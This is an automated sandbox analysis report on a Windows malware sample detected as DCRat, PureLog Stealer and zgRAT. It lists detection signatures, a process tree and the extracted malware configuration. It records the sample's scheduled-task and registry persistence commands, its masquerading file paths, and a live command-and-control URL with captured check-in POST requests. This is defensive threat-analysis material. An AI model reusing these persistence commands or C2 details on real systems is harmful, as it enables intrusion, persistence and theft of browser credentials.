Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lv961v43L3.exe

Overview

General Information

Sample name:lv961v43L3.exe
renamed because original name is a hash value
Original sample name:76802a2f25a771332d8c00ee56975818.exe
Analysis ID:1531317
MD5:76802a2f25a771332d8c00ee56975818
SHA1:2fa3d8e0a7d3285da7894c68983fcff150714559
SHA256:c877d0b38b1a395b38ff44494ea2d5e6f826c751503ae8c3d90e3afa9d6ff348
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • lv961v43L3.exe (PID: 180 cmdline: "C:\Users\user\Desktop\lv961v43L3.exe" MD5: 76802A2F25A771332D8C00EE56975818)
    • schtasks.exe (PID: 5040 cmdline: schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 7 /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 412 cmdline: schtasks.exe /create /tn "apERZQztEJsqymITPFxguVe" /sc ONLOGON /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 940 cmdline: schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 7 /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • csc.exe (PID: 1476 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 5084 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71E1.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC7685716E115C40A19F7FCCC6DF33F58B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 2260 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 736 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73C6.tmp" "c:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 5468 cmdline: schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 6 /tr "'C:\Recovery\apERZQztEJsqymITPFxguVe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5836 cmdline: schtasks.exe /create /tn "apERZQztEJsqymITPFxguVe" /sc ONLOGON /tr "'C:\Recovery\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6504 cmdline: schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 10 /tr "'C:\Recovery\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1720 cmdline: schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 6 /tr "'C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 432 cmdline: schtasks.exe /create /tn "apERZQztEJsqymITPFxguVe" /sc ONLOGON /tr "'C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6224 cmdline: schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 10 /tr "'C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 652 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6620 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5968 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6632 cmdline: schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\SystemSettings.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2676 cmdline: schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Users\Default User\SystemSettings.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1848 cmdline: schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\SystemSettings.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1276 cmdline: schtasks.exe /create /tn "lv961v43L3l" /sc MINUTE /mo 11 /tr "'C:\Users\user\Desktop\lv961v43L3.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1200 cmdline: schtasks.exe /create /tn "lv961v43L3" /sc ONLOGON /tr "'C:\Users\user\Desktop\lv961v43L3.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6484 cmdline: schtasks.exe /create /tn "lv961v43L3l" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\lv961v43L3.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6472 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rjP0QDXGdr.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5252 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 320 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • lv961v43L3.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\lv961v43L3.exe" MD5: 76802A2F25A771332D8C00EE56975818)
  • apERZQztEJsqymITPFxguVe.exe (PID: 4996 cmdline: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe MD5: 76802A2F25A771332D8C00EE56975818)
  • apERZQztEJsqymITPFxguVe.exe (PID: 6368 cmdline: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe MD5: 76802A2F25A771332D8C00EE56975818)
  • lv961v43L3.exe (PID: 5040 cmdline: C:\Users\user\Desktop\lv961v43L3.exe MD5: 76802A2F25A771332D8C00EE56975818)
  • lv961v43L3.exe (PID: 940 cmdline: C:\Users\user\Desktop\lv961v43L3.exe MD5: 76802A2F25A771332D8C00EE56975818)
  • StartMenuExperienceHost.exe (PID: 6224 cmdline: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe MD5: 76802A2F25A771332D8C00EE56975818)
  • StartMenuExperienceHost.exe (PID: 764 cmdline: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe MD5: 76802A2F25A771332D8C00EE56975818)
  • SystemSettings.exe (PID: 1272 cmdline: "C:\Users\Default User\SystemSettings.exe" MD5: 76802A2F25A771332D8C00EE56975818)
  • SystemSettings.exe (PID: 2072 cmdline: "C:\Users\Default User\SystemSettings.exe" MD5: 76802A2F25A771332D8C00EE56975818)
  • apERZQztEJsqymITPFxguVe.exe (PID: 7452 cmdline: "C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe" MD5: 76802A2F25A771332D8C00EE56975818)
  • StartMenuExperienceHost.exe (PID: 7724 cmdline: "C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe" MD5: 76802A2F25A771332D8C00EE56975818)
  • SystemSettings.exe (PID: 8112 cmdline: "C:\Users\Default User\SystemSettings.exe" MD5: 76802A2F25A771332D8C00EE56975818)
  • cleanup

Malware Configuration

Threatname: DCRat

{"C2 url": "http://863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic", "MUTEX": "DCR_MUTEX-DDVr7jAKL4sPNJFYbkfE", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "false", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
lv961v43L3.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    lv961v43L3.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Recovery\apERZQztEJsqymITPFxguVe.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\apERZQztEJsqymITPFxguVe.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Users\Default\SystemSettings.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Users\Default\SystemSettings.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Users\Default\SystemSettings.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000029.00000002.3272135764.00000000037B2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000029.00000002.3272135764.0000000003B19000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000000.00000000.2012463361.0000000000042000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000029.00000002.3272135764.0000000003DD3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000029.00000002.3272135764.0000000003904000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 5 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.lv961v43L3.exe.40000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.lv961v43L3.exe.40000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Execution from Suspicious Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\SystemSettings.exe", CommandLine: "C:\Users\Default User\SystemSettings.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\SystemSettings.exe, NewProcessName: C:\Users\Default\SystemSettings.exe, OriginalFileName: C:\Users\Default\SystemSettings.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Users\Default User\SystemSettings.exe", ProcessId: 1272, ProcessName: SystemSettings.exe
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 2260, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\lv961v43L3.exe, ProcessId: 180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\apERZQztEJsqymITPFxguVe
                              Sigma detected: CurrentVersion NT Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\lv961v43L3.exe, ProcessId: 180, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\lv961v43L3.exe", ParentImage: C:\Users\user\Desktop\lv961v43L3.exe, ParentProcessId: 180, ParentProcessName: lv961v43L3.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline", ProcessId: 1476, ProcessName: csc.exe
                              Sigma detected: Dynamic CSharp Compile Artefact
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\lv961v43L3.exe, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline

                              Data Obfuscation

                              barindex
                              Sigma detected: Dot net compiler compiles file from suspicious location
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\lv961v43L3.exe", ParentImage: C:\Users\user\Desktop\lv961v43L3.exe, ParentProcessId: 180, ParentProcessName: lv961v43L3.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline", ProcessId: 1476, ProcessName: csc.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-11T01:36:29.442306+020020480951A Network Trojan was detected192.168.2.549760188.114.96.380TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: lv961v43L3.exeAvira: detected
                              Antivirus detection for dropped file
                              Source: C:\Users\user\Desktop\DBipIDSx.logAvira: detection malicious, Label: TR/Agent.jbwuj
                              Source: C:\Users\user\Desktop\QaswzdXY.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\Desktop\MnaxWgIk.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Users\Default\SystemSettings.exeAvira: detection malicious, Label: HEUR/AGEN.1329680
                              Source: C:\Recovery\apERZQztEJsqymITPFxguVe.exeAvira: detection malicious, Label: HEUR/AGEN.1329680
                              Source: C:\Users\user\Desktop\SzzvMtRI.logAvira: detection malicious, Label: TR/Agent.jbwuj
                              Source: C:\Users\user\AppData\Local\Temp\rjP0QDXGdr.batAvira: detection malicious, Label: BAT/Delbat.C
                              Found malware configuration
                              Source: 00000000.00000002.2085959223.0000000012641000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic", "MUTEX": "DCR_MUTEX-DDVr7jAKL4sPNJFYbkfE", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "false", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Recovery\apERZQztEJsqymITPFxguVe.exeReversingLabs: Detection: 70%
                              Source: C:\Users\Default\SystemSettings.exeReversingLabs: Detection: 73%
                              Source: C:\Users\user\Desktop\DBipIDSx.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\HkLqVmri.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\KzWplSMm.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\LRfgsxYe.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\MnaxWgIk.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\QaswzdXY.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\SzzvMtRI.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\UQjmGZYR.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\aBctEWCA.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\yHDAltbA.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\ysVaBXSD.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\zpwiWXhy.logReversingLabs: Detection: 20%
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeReversingLabs: Detection: 73%
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeReversingLabs: Detection: 73%
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeReversingLabs: Detection: 73%
                              Multi AV Scanner detection for submitted file
                              Source: lv961v43L3.exeReversingLabs: Detection: 70%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\Desktop\BQDZBqHE.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\QaswzdXY.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\MnaxWgIk.logJoe Sandbox ML: detected
                              Source: C:\Users\Default\SystemSettings.exeJoe Sandbox ML: detected
                              Source: C:\Recovery\apERZQztEJsqymITPFxguVe.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\Gnkizmcn.logJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: lv961v43L3.exeJoe Sandbox ML: detected
                              Source: lv961v43L3.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: lv961v43L3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.pdb source: lv961v43L3.exe, 00000000.00000002.2080922506.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.pdb source: lv961v43L3.exe, 00000000.00000002.2080922506.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp

                              Spreading

                              barindex
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49760 -> 188.114.96.3:80
                              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2580Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1916Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1916Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 157336Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1916Expect: 100-continue
